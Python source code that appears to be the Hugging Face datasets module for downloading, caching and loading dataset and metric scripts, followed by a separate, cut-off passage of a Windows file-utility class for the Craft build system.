    Returns the first non-abstract subclass found in the module namespace, or None if there is none.
    """
    module = importlib.import_module(module_path)
    main_cls_type = DatasetBuilder if dataset else Metric
    # Scan the module namespace for the first concrete subclass of the expected base class.
    for candidate in module.__dict__.values():
        if isinstance(candidate, type) and issubclass(candidate, main_cls_type):
            if not inspect.isabstract(candidate):
                return candidate
    return None
def files_to_hash(file_paths: List[str]) -> str:
    """
    Convert a list of scripts or text files provided in `file_paths` into a hashed filename
    in a repeatable way. Directories are expanded to all the python files they contain (recursively).
    """
    # Expand any directory supplied as part of external imports into its python files.
    expanded_paths: List[Union[Path, str]] = []
    for entry in file_paths:
        if os.path.isdir(entry):
            expanded_paths.extend(Path(entry).rglob("*.[pP][yY]"))
        else:
            expanded_paths.append(entry)
    # Concatenate the source lines of all files and hash them together.
    all_lines = []
    for entry in expanded_paths:
        with open(entry, mode="r", encoding="utf-8") as source_file:
            all_lines.extend(source_file.readlines())
    return hash_python_lines(all_lines)
def convert_github_url(url_path: str) -> Tuple[str, Optional[str]]:
    """Convert a link to a file on a github repo in a link to the raw github object.

    Args:
        url_path: The url to convert.

    Returns:
        A tuple ``(url, sub_directory)``:

        - for a github "blob" file url: the corresponding "raw" file url and ``None``;
        - for a github repository url: the url of the zip archive of the relevant branch
          (default "master") and the name of the sub-directory the archive extracts to;
        - any other url: returned unchanged, with ``None``.
    """
    parsed = urlparse(url_path)
    sub_directory = None
    if parsed.scheme in ("http", "https", "s3") and parsed.netloc == "github.com":
        # Check for the "/blob/" *path segment* (not just the substring "blob", which
        # would also match owner/repo/file names containing "blob").
        if "/blob/" in parsed.path:
            assert url_path.endswith(
                ".py"
            ), f"External import from github at {url_path} should point to a file ending with '.py'"
            # Replace only the first "/blob/" segment (owner/repo position) to point to the raw file.
            url_path = url_path.replace("/blob/", "/raw/", 1)
        else:
            # Parse github url to point to the zip archive of the repository
            github_path = parsed.path[1:]
            repo_info, branch = github_path.split("/tree/") if "/tree/" in github_path else (github_path, "master")
            repo_owner, repo_name = repo_info.split("/")
            url_path = "https://github.com/{}/{}/archive/{}.zip".format(repo_owner, repo_name, branch)
            # Github archives extract into a "<repo>-<branch>" sub-directory.
            sub_directory = f"{repo_name}-{branch}"
    return url_path, sub_directory
def get_imports(file_path: str) -> List[Tuple[str, str, str, Optional[str]]]:
    r"""Find whether we should import or clone additional files for a given processing script, and list them.

    We allow:
    - library dependencies,
    - local dependencies and
    - external dependencies whose url is specified with a comment starting with "# From:" followed by the raw url to a file, an archive or a github repository.
      External dependencies will be downloaded (and extracted if needed, in the dataset folder).
    We also add an `__init__.py` to each sub-folder of a downloaded folder so the user can import from them in the script.

    Note that only direct imports in the dataset processing script will be handled:
    we don't recursively explore the additional imports to download further files.

    Returns a list of ``(import_type, import_name, import_path, sub_directory)`` tuples where
    ``import_type`` is one of "library", "internal" or "external".

    Examples::

        import tensorflow
        import .c4_utils
        import .clicr.dataset-code.build_json_dataset # From: https://raw.githubusercontent.com/clips/clicr/master/dataset-code/build_json_dataset
    """
    # Read the whole processing script.
    lines = []
    with open(file_path, mode="r", encoding="utf-8") as f:
        lines.extend(f.readlines())
    logger.debug("Checking %s for additional imports.", file_path)
    imports: List[Tuple[str, str, str, Optional[str]]] = []
    # Track whether the current line sits inside a triple-quoted docstring so that
    # import statements appearing in documentation are not treated as dependencies.
    is_in_docstring = False
    for line in lines:
        docstr_start_match = re.findall(r'[\s\S]*?"""[\s\S]*?', line)
        if len(docstr_start_match) == 1:
            # flip True <=> False only if a docstring
            # starts at this line without finishing on it
            is_in_docstring = not is_in_docstring
        if is_in_docstring:
            # import statements in docstrings should
            # not be added as required dependencies
            continue
        # Match "import x" style statements, capturing an optional leading dot (relative import)
        # and an optional trailing "# From: <url>" comment.
        match = re.match(r"^import\s+(\.?)([^\s\.]+)[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)", line, flags=re.MULTILINE)
        if match is None:
            # Fall back to "from x import y" style statements.
            match = re.match(
                r"^from\s+(\.?)([^\s\.]+)(?:[^\s]*)\s+import\s+[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)",
                line,
                flags=re.MULTILINE,
            )
            if match is None:
                continue
        if match.group(1):
            # The import starts with a '.', we will download the relevant file
            if any(imp[1] == match.group(2) for imp in imports):
                # We already have this import
                continue
            if match.group(3):
                # The import has a comment with 'From:', we'll retrieve it from the given url
                url_path = match.group(3)
                url_path, sub_directory = convert_github_url(url_path)
                imports.append(("external", match.group(2), url_path, sub_directory))
            elif match.group(2):
                # The import should be at the same place as the file
                imports.append(("internal", match.group(2), match.group(2), None))
        else:
            if match.group(3):
                # The import has a comment with `From: git+https:...`, asks user to pip install from git.
                url_path = match.group(3)
                imports.append(("library", match.group(2), url_path, None))
            else:
                imports.append(("library", match.group(2), match.group(2), None))
    return imports
def prepare_module(
    path: str,
    script_version: Optional[Union[str, Version]] = None,
    download_config: Optional[DownloadConfig] = None,
    download_mode: Optional[GenerateMode] = None,
    dataset: bool = True,
    force_local_path: Optional[str] = None,
    dynamic_modules_path: Optional[str] = None,
    return_resolved_file_path: bool = False,
    **download_kwargs,
) -> Union[Tuple[str, str], Tuple[str, str, Optional[str]]]:
    r"""
    Download/extract/cache a dataset (if dataset==True) or a metric (if dataset==False)

    Dataset and metrics codes are cached inside the dynamic modules cache to allow easy import (avoid ugly sys.path tweaks)
    and using cloudpickle (among other things).

    Args:
        path (str):
            path to the dataset or metric script, can be either:
                - a path to a local directory containing the dataset processing python script
                - an url to a github or S3 directory with a dataset processing python script
        script_version (Optional ``Union[str, datasets.Version]``):
            If specified, the module will be loaded from the datasets repository at this version.
            By default:
            - it is set to the local version of the lib.
            - it will also try to load it from the master branch if it's not available at the local version of the lib.
            Specifying a version that is different from your local version of the lib might cause compatibility issues.
        download_config (Optional ``datasets.DownloadConfig``): specific download configuration parameters.
        download_mode (Optional ``datasets.GenerateMode``): select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS.
        dataset (bool): True if the script to load is a dataset, False if the script is a metric.
        force_local_path (Optional str): Optional path to a local path to download and prepare the script to.
            Used to inspect or modify the script folder.
        dynamic_modules_path (Optional str, defaults to HF_MODULES_CACHE / "datasets_modules", i.e. ~/.cache/huggingface/modules/datasets_modules):
            Optional path to the directory in which the dynamic modules are saved. It must have been initialized with :obj:`init_dynamic_modules`.
            By default the datasets and metrics are stored inside the `datasets_modules` module.
        return_resolved_file_path (Optional bool, defaults to False):
            If True, the url or path to the resolved dataset or metric script is returned with the other outputs
        download_kwargs: optional attributes for DownloadConfig() which will override the attributes in download_config if supplied.

    Return: Tuple[``str``, ``str``] with
        1. The module path being
            - the import path of the dataset/metric package if force_local_path is False: e.g. 'datasets.datasets.squad'
            - the local path to the dataset/metric file if force_local_path is True: e.g. '/User/huggingface/datasets/datasets/squad/squad.py'
        2. A hash string computed from the content of the dataset loading script.
    """
    if download_config is None:
        download_config = DownloadConfig(**download_kwargs)
    # NOTE(review): when a download_config instance is passed in, download_kwargs are silently
    # ignored (they only seed a newly created DownloadConfig) -- confirm against the documented
    # contract which says they override the supplied config.
    download_config.extract_compressed_file = True
    download_config.force_extract = True

    module_type = "dataset" if dataset else "metric"
    # Last non-empty path component is the script name; ensure it carries the '.py' suffix.
    name = list(filter(lambda x: x, path.replace(os.sep, "/").split("/")))[-1]
    if not name.endswith(".py"):
        name = name + ".py"

    # Short name is name without the '.py' at the end (for the module)
    short_name = name[:-3]

    # first check if the module is packaged with the `datasets` package
    if dataset and path in _PACKAGED_DATASETS_MODULES:
        try:
            # HEAD request only serves telemetry/availability; failures are non-fatal.
            head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
        except Exception:
            logger.debug(f"Couldn't head HF s3 for packaged dataset module '{path}'. Running in offline mode.")
        module_path, hash = _PACKAGED_DATASETS_MODULES[path]
        if return_resolved_file_path:
            return module_path, hash, None
        return module_path, hash

    # otherwise the module is added to the dynamic modules
    dynamic_modules_path = dynamic_modules_path if dynamic_modules_path else init_dynamic_modules()
    module_name_for_dynamic_modules = os.path.basename(dynamic_modules_path)
    datasets_modules_path = os.path.join(dynamic_modules_path, "datasets")
    datasets_modules_name = module_name_for_dynamic_modules + ".datasets"
    metrics_modules_path = os.path.join(dynamic_modules_path, "metrics")
    metrics_modules_name = module_name_for_dynamic_modules + ".metrics"

    if force_local_path is None:
        main_folder_path = os.path.join(datasets_modules_path if dataset else metrics_modules_path, short_name)
    else:
        main_folder_path = force_local_path

    # We have three ways to find the processing file:
    # - if os.path.join(path, name) is a file or a remote url
    # - if path is a file or a remote url
    # - otherwise we assume path/name is a path to our S3 bucket
    combined_path = os.path.join(path, name)
    if os.path.isfile(combined_path):
        file_path = combined_path
        local_path = file_path
    elif os.path.isfile(path):
        file_path = path
        local_path = path
    else:
        # Try github (canonical datasets/metrics) and then S3 (users datasets/metrics)
        try:
            head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
            script_version = str(script_version) if script_version is not None else None
            if path.count("/") == 0:  # canonical datasets/metrics: github path
                file_path = hf_github_url(path=path, name=name, dataset=dataset, version=script_version)
                try:
                    local_path = cached_path(file_path, download_config=download_config)
                except FileNotFoundError:
                    if script_version is not None:
                        # An explicit version was requested: don't fall back, fail loudly.
                        raise FileNotFoundError(
                            "Couldn't find remote file with version {} at {}. Please provide a valid version and a valid {} name".format(
                                script_version, file_path, "dataset" if dataset else "metric"
                            )
                        )
                    else:
                        # No explicit version: retry against the master branch.
                        github_file_path = file_path
                        file_path = hf_github_url(path=path, name=name, dataset=dataset, version="master")
                        try:
                            local_path = cached_path(file_path, download_config=download_config)
                            logger.warning(
                                "Couldn't find file locally at {}, or remotely at {}.\n"
                                "The file was picked from the master branch on github instead at {}.".format(
                                    combined_path, github_file_path, file_path
                                )
                            )
                        except FileNotFoundError:
                            raise FileNotFoundError(
                                "Couldn't find file locally at {}, or remotely at {}.\n"
                                "The file is also not present on the master branch on github.".format(
                                    combined_path, github_file_path
                                )
                            )
            elif path.count("/") == 1:  # users datasets/metrics: s3 path (hub for datasets and s3 for metrics)
                if dataset:
                    file_path = hf_hub_url(path=path, name=name, version=script_version)
                else:
                    file_path = hf_bucket_url(path, filename=name, dataset=False)
                try:
                    local_path = cached_path(file_path, download_config=download_config)
                except FileNotFoundError:
                    raise FileNotFoundError(
                        "Couldn't find file locally at {}, or remotely at {}. Please provide a valid {} name".format(
                            combined_path, file_path, "dataset" if dataset else "metric"
                        )
                    )
            else:
                raise FileNotFoundError(
                    "Couldn't find file locally at {}. Please provide a valid {} name".format(
                        combined_path, "dataset" if dataset else "metric"
                    )
                )
        except Exception as e:  # noqa: all the attempts failed, before raising the error we should check if the module already exists.
            if os.path.isdir(main_folder_path):
                # Hash folders are 64-char hex digests; anything else is ignored.
                hashes = [h for h in os.listdir(main_folder_path) if len(h) == 64]
                if hashes:
                    # get most recent
                    def _get_modification_time(module_hash):
                        return (Path(main_folder_path) / module_hash / name).stat().st_mtime

                    hash = sorted(hashes, key=_get_modification_time)[-1]
                    module_path = ".".join(
                        [datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
                    )
                    logger.warning(
                        f"Using the latest cached version of the module from {os.path.join(main_folder_path, hash)} "
                        f"(last modified on {time.ctime(_get_modification_time(hash))}) since it "
                        f"couldn't be found locally at {combined_path} or remotely ({type(e).__name__})."
                    )
                    if return_resolved_file_path:
                        with open(os.path.join(main_folder_path, hash, short_name + ".json")) as cache_metadata:
                            file_path = json.load(cache_metadata)["original file path"]
                        return module_path, hash, file_path
                    return module_path, hash
            raise

    # Load the module in two steps:
    # 1. get the processing file on the local filesystem if it's not there (download to cache dir)
    # 2. copy from the local file system inside the modules cache to import it
    base_path = url_or_path_parent(file_path)  # remove the filename
    dataset_infos = url_or_path_join(base_path, config.DATASETDICT_INFOS_FILENAME)

    # Download the dataset infos file if available
    try:
        local_dataset_infos_path = cached_path(
            dataset_infos,
            download_config=download_config,
        )
    except (FileNotFoundError, ConnectionError):
        # The infos file is optional; absence is not an error.
        local_dataset_infos_path = None

    # Download external imports if needed
    imports = get_imports(local_path)
    local_imports = []
    library_imports = []
    for import_type, import_name, import_path, sub_directory in imports:
        if import_type == "library":
            library_imports.append((import_name, import_path))  # Import from a library
            continue

        if import_name == short_name:
            raise ValueError(
                f"Error in {module_type} script at {file_path}, importing relative {import_name} module "
                f"but {import_name} is the name of the {module_type} script. "
                f"Please change relative import {import_name} to another name and add a '# From: URL_OR_PATH' "
                f"comment pointing to the original relative import file path."
            )
        if import_type == "internal":
            url_or_filename = url_or_path_join(base_path, import_path + ".py")
        elif import_type == "external":
            url_or_filename = import_path
        else:
            raise ValueError("Wrong import_type")

        local_import_path = cached_path(
            url_or_filename,
            download_config=download_config,
        )
        if sub_directory is not None:
            local_import_path = os.path.join(local_import_path, sub_directory)
        local_imports.append((import_name, local_import_path))

    # Check library imports
    needs_to_be_installed = []
    for library_import_name, library_import_path in library_imports:
        try:
            lib = importlib.import_module(library_import_name)  # noqa F841
        except ImportError:
            needs_to_be_installed.append((library_import_name, library_import_path))
    if needs_to_be_installed:
        raise ImportError(
            f"To be able to use this {module_type}, you need to install the following dependencies "
            f"{[lib_name for lib_name, lib_path in needs_to_be_installed]} using 'pip install "
            f"{' '.join([lib_path for lib_name, lib_path in needs_to_be_installed])}' for instance"
        )

    # Define a directory with a unique name in our dataset or metric folder
    # path is: ./datasets|metrics/dataset|metric_name/hash_from_code/script.py
    # we use a hash to be able to have multiple versions of a dataset/metric processing file together
    hash = files_to_hash([local_path] + [loc[1] for loc in local_imports])
    if force_local_path is None:
        hash_folder_path = os.path.join(main_folder_path, hash)
    else:
        hash_folder_path = force_local_path
    local_file_path = os.path.join(hash_folder_path, name)
    dataset_infos_path = os.path.join(hash_folder_path, config.DATASETDICT_INFOS_FILENAME)

    # Prevent parallel disk operations
    lock_path = local_path + ".lock"
    with FileLock(lock_path):
        # Create main dataset/metrics folder if needed
        if download_mode == GenerateMode.FORCE_REDOWNLOAD and os.path.exists(main_folder_path):
            shutil.rmtree(main_folder_path)

        if not os.path.exists(main_folder_path):
            logger.info(f"Creating main folder for {module_type} {file_path} at {main_folder_path}")
            os.makedirs(main_folder_path, exist_ok=True)
        else:
            logger.info(f"Found main folder for {module_type} {file_path} at {main_folder_path}")

        # add an __init__ file to the main dataset folder if needed
        init_file_path = os.path.join(main_folder_path, "__init__.py")
        if not os.path.exists(init_file_path):
            with open(init_file_path, "w"):
                pass

        # Create hash dataset folder if needed
        if not os.path.exists(hash_folder_path):
            logger.info(f"Creating specific version folder for {module_type} {file_path} at {hash_folder_path}")
            os.makedirs(hash_folder_path)
        else:
            logger.info(f"Found specific version folder for {module_type} {file_path} at {hash_folder_path}")

        # add an __init__ file to the hash dataset folder if needed
        init_file_path = os.path.join(hash_folder_path, "__init__.py")
        if not os.path.exists(init_file_path):
            with open(init_file_path, "w"):
                pass

        # Copy dataset.py file in hash folder if needed
        if not os.path.exists(local_file_path):
            logger.info("Copying script file from %s to %s", file_path, local_file_path)
            shutil.copyfile(local_path, local_file_path)
        else:
            logger.info("Found script file from %s to %s", file_path, local_file_path)

        # Copy dataset infos file if needed
        if not os.path.exists(dataset_infos_path):
            if local_dataset_infos_path is not None:
                logger.info("Copying dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
                shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
            else:
                logger.info("Couldn't find dataset infos file at %s", dataset_infos)
        else:
            # Refresh the cached infos when the downloaded file differs from the cached copy.
            if local_dataset_infos_path is not None and not filecmp.cmp(local_dataset_infos_path, dataset_infos_path):
                logger.info("Updating dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
                shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
            else:
                logger.info("Found dataset infos file from %s to %s", dataset_infos, dataset_infos_path)

        # Record metadata associating original dataset path with local unique folder
        meta_path = local_file_path.split(".py")[0] + ".json"
        if not os.path.exists(meta_path):
            logger.info(f"Creating metadata file for {module_type} {file_path} at {meta_path}")
            meta = {"original file path": file_path, "local file path": local_file_path}
            # the filename is *.py in our case, so better rename to filenam.json instead of filename.py.json
            with open(meta_path, "w", encoding="utf-8") as meta_file:
                json.dump(meta, meta_file)
        else:
            logger.info(f"Found metadata file for {module_type} {file_path} at {meta_path}")

        # Copy all the additional imports
        for import_name, import_path in local_imports:
            if os.path.isfile(import_path):
                full_path_local_import = os.path.join(hash_folder_path, import_name + ".py")
                if not os.path.exists(full_path_local_import):
                    logger.info("Copying local import file from %s at %s", import_path, full_path_local_import)
                    shutil.copyfile(import_path, full_path_local_import)
                else:
                    logger.info("Found local import file from %s at %s", import_path, full_path_local_import)
            elif os.path.isdir(import_path):
                full_path_local_import = os.path.join(hash_folder_path, import_name)
                if not os.path.exists(full_path_local_import):
                    logger.info("Copying local import directory from %s at %s", import_path, full_path_local_import)
                    shutil.copytree(import_path, full_path_local_import)
                else:
                    logger.info("Found local import directory from %s at %s", import_path, full_path_local_import)
            else:
                raise OSError(f"Error with local import at {import_path}")

    if force_local_path is None:
        module_path = ".".join(
            [datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
        )
    else:
        module_path = local_file_path

    # make the new module to be noticed by the import system
    importlib.invalidate_caches()
    if return_resolved_file_path:
        return module_path, hash, file_path
    return module_path, hash
def load_metric(
    path: str,
    config_name: Optional[str] = None,
    process_id: int = 0,
    num_process: int = 1,
    cache_dir: Optional[str] = None,
    experiment_id: Optional[str] = None,
    keep_in_memory: bool = False,
    download_config: Optional[DownloadConfig] = None,
    download_mode: Optional[GenerateMode] = None,
    script_version: Optional[Union[str, Version]] = None,
    **metric_init_kwargs,
) -> Metric:
    r"""Load a `datasets.Metric`.

    Args:
        path (``str``): path to the metric processing script with the metric builder. Either:
            - a local path to the script, or to the directory containing it when the script and the
              directory share a name, e.g. ``'./metrics/rouge'`` or ``'./metrics/rogue/rouge.py'``
            - a metric identifier on the HuggingFace datasets repo, e.g. ``'rouge'`` or ``'bleu'``
              (list all available metrics with ``datasets.list_metrics()``)
        config_name (Optional ``str``): configuration of the metric to select (e.g. each GLUE subset has its own configuration)
        process_id (Optional ``int``): id of this process, for distributed evaluation
        num_process (Optional ``int``): total number of processes, for distributed evaluation
        cache_dir (Optional str): directory for temporary predictions and references (default `~/.cache/metrics/`)
        experiment_id (``str``): a specific experiment id, needed when several distributed evaluations
            share one file system. Useful for non-additive metrics like F1 in distributed setups.
        keep_in_memory (bool): keep the temporary results in memory instead of on disk (defaults to False)
        download_config (Optional ``datasets.DownloadConfig``): specific download configuration parameters.
        download_mode (Optional `datasets.GenerateMode`): select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
        script_version (Optional ``Union[str, datasets.Version]``): load the module from the datasets
            repository at this version. Defaults to the local version of the lib; a different version
            may cause compatibility issues.

    Returns:
        `datasets.Metric`
    """
    # Resolve (download/cache) the metric script and make it importable.
    module_path, module_hash = prepare_module(
        path,
        script_version=script_version,
        download_config=download_config,
        download_mode=download_mode,
        dataset=False,
    )

    # Import the Metric subclass defined by the script and instantiate it.
    metric_cls = import_main_class(module_path, dataset=False)
    metric = metric_cls(
        config_name=config_name,
        process_id=process_id,
        num_process=num_process,
        cache_dir=cache_dir,
        keep_in_memory=keep_in_memory,
        experiment_id=experiment_id,
        **metric_init_kwargs,
    )

    # Download and prepare resources for the metric
    metric.download_and_prepare(download_config=download_config)

    return metric
def load_dataset(
    path: str,
    name: Optional[str] = None,
    data_dir: Optional[str] = None,
    data_files: Optional[Union[Dict, List]] = None,
    split: Optional[Union[str, Split]] = None,
    cache_dir: Optional[str] = None,
    features: Optional[Features] = None,
    download_config: Optional[DownloadConfig] = None,
    download_mode: Optional[GenerateMode] = None,
    ignore_verifications: bool = False,
    keep_in_memory: Optional[bool] = None,
    save_infos: bool = False,
    script_version: Optional[Union[str, Version]] = None,
    use_auth_token: Optional[Union[bool, str]] = None,
    task: Optional[Union[str, TaskTemplate]] = None,
    streaming: bool = False,
    **config_kwargs,
) -> Union[DatasetDict, Dataset, IterableDatasetDict, IterableDataset]:
    """Load a dataset.

    This method does the following under the hood:

        1. Download and import in the library the dataset loading script from ``path`` if it's not already cached inside the library.

            Processing scripts are small python scripts that define the citation, info and format of the dataset,
            contain the URL to the original data files and the code to load examples from the original data files.

            You can find some of the scripts here: https://github.com/huggingface/datasets/datasets
            and easily upload yours to share them using the CLI ``huggingface-cli``.
            You can find the complete list of datasets in the Datasets Hub at https://huggingface.co/datasets

        2. Run the dataset loading script which will:

            * Download the dataset file from the original URL (see the script) if it's not already downloaded and cached.
            * Process and cache the dataset in typed Arrow tables for caching.

                Arrow table are arbitrarily long, typed tables which can store nested objects and be mapped to numpy/pandas/python standard types.
                They can be directly accessed from drive, loaded in RAM or even streamed over the web.

        3. Return a dataset built from the requested splits in ``split`` (default: all).

    Args:
        path (:obj:`str`): Path to the dataset processing script with the dataset builder. Can be either:

            - a local path to processing script or the directory containing the script (if the script has the same name as the directory),
              e.g. ``'./dataset/squad'`` or ``'./dataset/squad/squad.py'``.
            - a dataset identifier in the HuggingFace Datasets Hub (list all available datasets and ids with ``datasets.list_datasets()``)
              e.g. ``'squad'``, ``'glue'`` or ``'openai/webtext'``.
        name (:obj:`str`, optional): Defining the name of the dataset configuration.
        data_files (:obj:`str`, optional): Defining the data_files of the dataset configuration.
        data_dir (:obj:`str`, optional): Defining the data_dir of the dataset configuration.
        split (:class:`Split` or :obj:`str`): Which split of the data to load.
            If None, will return a `dict` with all splits (typically `datasets.Split.TRAIN` and `datasets.Split.TEST`).
            If given, will return a single Dataset.
            Splits can be combined and specified like in tensorflow-datasets.
        cache_dir (:obj:`str`, optional): Directory to read/write data. Defaults to "~/datasets".
        features (:class:`Features`, optional): Set the features type to use for this dataset.
        download_config (:class:`~utils.DownloadConfig`, optional): Specific download configuration parameters.
        download_mode (:class:`GenerateMode`, optional): Select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
        ignore_verifications (:obj:`bool`, default ``False``): Ignore the verifications of the downloaded/processed dataset information (checksums/size/splits/...).
        keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
            will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
            nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
        save_infos (:obj:`bool`, default ``False``): Save the dataset information (checksums/size/splits/...).
        script_version (:class:`~utils.Version` or :obj:`str`, optional): Version of the dataset script to load:

            - For canonical datasets in the `huggingface/datasets` library like "squad", the default version of the module is the local version of the lib.
              You can specify a different version from your local version of the lib (e.g. "master" or "1.2.0") but it might cause compatibility issues.
            - For community provided datasets like "lhoestq/squad" that have their own git repository on the Datasets Hub, the default version "main" corresponds to the "main" branch.
              You can specify a different version than the default "main" by using a commit sha or a git tag of the dataset repository.
        use_auth_token (``str`` or ``bool``, optional): Optional string or boolean to use as Bearer token for remote files on the Datasets Hub.
            If True, will get token from `"~/.huggingface"`.
        task (``str``): The task to prepare the dataset for during training and evaluation. Casts the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`.
        streaming (``bool``, default ``False``): If set to True, don't download the data files. Instead, it streams the data progressively while
            iterating on the dataset. An IterableDataset or IterableDatasetDict is returned instead in this case.

            Note that streaming works for datasets that use data formats that support being iterated over like txt, csv, jsonl for example.
            Json files may be downloaded completely. Also streaming from remote zip or gzip files is supported but other compressed formats
            like rar and xz are not yet supported. The tgz format doesn't allow streaming.
        **config_kwargs: Keyword arguments to be passed to the :class:`BuilderConfig` and used in the :class:`DatasetBuilder`.

    Returns:
        :class:`Dataset` or :class:`DatasetDict`:
            if `split` is not None: the dataset requested,
            if `split` is None, a ``datasets.DatasetDict`` with each split.
        or :class:`IterableDataset` or :class:`IterableDatasetDict` if streaming=True:
            if `split` is not None: the dataset requested,
            if `split` is None, a ``datasets.streaming.IterableDatasetDict`` with each split.
    """
    # Saving infos implies regenerating them, so verification against stale infos must be skipped.
    ignore_verifications = ignore_verifications or save_infos

    # Check streaming
    if streaming:
        if not config.AIOHTTP_AVAILABLE:
            raise ImportError(
                "To be able to use dataset streaming, you need to install dependencies like aiohttp "
                "using 'pip install datasets[streaming]' or 'pip install aiohttp' for instance"
            )

    # Download/copy dataset processing script
    module_path, hash, resolved_file_path = prepare_module(
        path,
        script_version=script_version,
        download_config=download_config,
        download_mode=download_mode,
        dataset=True,
        return_resolved_file_path=True,
        use_auth_token=use_auth_token,
    )
    # Set the base path for downloads as the parent of the script location
    if resolved_file_path is not None:
        base_path = url_or_path_parent(resolved_file_path)
    else:
        base_path = None

    # Get dataset builder class from the processing script
    builder_cls = import_main_class(module_path, dataset=True)

    # Instantiate the dataset builder
    builder_instance: DatasetBuilder = builder_cls(
        cache_dir=cache_dir,
        name=name,
        data_dir=data_dir,
        data_files=data_files,
        hash=hash,
        features=features,
        **config_kwargs,
    )

    # Return iterable dataset in case of streaming
    if streaming:
        # this extends the open and os.path.join functions for data streaming
        extend_module_for_streaming(module_path, use_auth_token=use_auth_token)
        return builder_instance.as_streaming_dataset(
            split=split,
            base_path=base_path,
            use_auth_token=use_auth_token,
        )

    # Some datasets are already processed on the HF google storage
    # Don't try downloading from google storage for the packaged datasets as text, json, csv or pandas
    try_from_hf_gcs = path not in _PACKAGED_DATASETS_MODULES

    # Download and prepare data
    builder_instance.download_and_prepare(
        download_config=download_config,
        download_mode=download_mode,
        ignore_verifications=ignore_verifications,
        try_from_hf_gcs=try_from_hf_gcs,
        base_path=base_path,
        use_auth_token=use_auth_token,
    )

    # Build dataset for splits
    keep_in_memory = (
        keep_in_memory if keep_in_memory is not None else is_small_dataset(builder_instance.info.dataset_size)
    )
    ds = builder_instance.as_dataset(split=split, ignore_verifications=ignore_verifications, in_memory=keep_in_memory)
    # Rename and cast features to match task schema
    if task is not None:
        ds = ds.prepare_for_task(task)
    if save_infos:
        builder_instance._save_infos()

    return ds
def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> Union[Dataset, DatasetDict]:
    """
    Loads a dataset that was previously saved using ``dataset.save_to_disk(dataset_path)`` from a dataset directory, or
    from a filesystem using either :class:`datasets.filesystems.S3FileSystem` or any implementation of
    ``fsspec.spec.AbstractFileSystem``.

    Args:
        dataset_path (:obj:`str`): Path (e.g. ``"dataset/train"``) or remote uri (e.g.
            ``"s3://my-bucket/dataset/train"``) of the Dataset or DatasetDict directory to load from.
        fs (:class:`~filesystems.S3FileSystem` or ``fsspec.spec.AbstractFileSystem``, optional, default ``None``):
            Instance of the remote filesystem used to download the files from.
        keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
            will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
            nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.

    Returns:
        ``datasets.Dataset`` or ``datasets.DatasetDict``:
            if `dataset_path` points at a dataset directory: the dataset requested,
            if `dataset_path` points at a dataset dict directory: a ``datasets.DatasetDict`` with each split.
    """
    # Resolve the filesystem: remote (e.g. s3://) paths are stripped of their uri scheme,
    # otherwise fall back to the local filesystem.
    if is_remote_filesystem(fs):
        resolved_path = extract_path_from_uri(dataset_path)
    else:
        fs = fsspec.filesystem("file")
        resolved_path = dataset_path

    if not fs.exists(resolved_path):
        raise FileNotFoundError("Directory {} not found".format(dataset_path))

    # A single-dataset directory carries a dataset info file; a dataset-dict directory
    # carries the dataset dict json marker instead.
    info_marker = Path(resolved_path, config.DATASET_INFO_FILENAME).as_posix()
    dict_marker = Path(resolved_path, config.DATASETDICT_JSON_FILENAME).as_posix()
    if fs.isfile(info_marker):
        return Dataset.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
    if fs.isfile(dict_marker):
        return DatasetDict.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
    raise FileNotFoundError(
        "Directory {} is neither a dataset directory nor a dataset dict directory.".format(dataset_path)
    )
|
import tempfile
import ctypes
import os
import platform
import subprocess
import CraftOS.OsUtilsBase
from CraftCore import CraftCore
class FileAttributes():
    # Win32 file attribute flag constants.
    # https://msdn.microsoft.com/en-us/library/windows/desktop/gg258117(v=vs.85).aspx
    FILE_ATTRIBUTE_READONLY = 0x1  # file is read-only
    FILE_ATTRIBUTE_REPARSE_POINT = 0x400  # file/directory is a reparse point (junction, symlink, ...)
class OsUtils(CraftOS.OsUtilsBase.OsUtilsBase):
    """Windows implementation of Craft's OS utility helpers, built on Win32 calls via ctypes."""

    @staticmethod
    def rm(path, force=False):
        """Delete a single file; returns True on success (DeleteFileW returns non-zero)."""
        CraftCore.log.debug("deleting file %s" % path)
        if force:
            # read-only files cannot be deleted, so strip the attribute first
            OsUtils.removeReadOnlyAttribute(path)
        return ctypes.windll.kernel32.DeleteFileW(path) != 0

    @staticmethod
    def rmDir(path, force=False):
        """Remove a directory; returns True on success (RemoveDirectoryW returns non-zero)."""
        CraftCore.log.debug("deleting directory %s" % path)
        if force:
            OsUtils.removeReadOnlyAttribute(path)
        return ctypes.windll.kernel32.RemoveDirectoryW(path) != 0

    @staticmethod
    def isLink(path):
        """Truthy when path is a symlink or carries the reparse-point attribute (e.g. a junction)."""
        # NOTE(review): bitwise '|' (not boolean 'or') -- both operands are always evaluated
        # and the result is an int that callers treat as truthy.
        return os.path.islink(path) \
            | OsUtils.getFileAttributes(path) & FileAttributes.FILE_ATTRIBUTE_REPARSE_POINT # Detect a Junction

    @staticmethod
    def getFileAttributes(path):
        """Return the raw Win32 attribute bitmask for path (GetFileAttributesW)."""
        return ctypes.windll.kernel32.GetFileAttributesW(path)

    @staticmethod
    def removeReadOnlyAttribute(path):
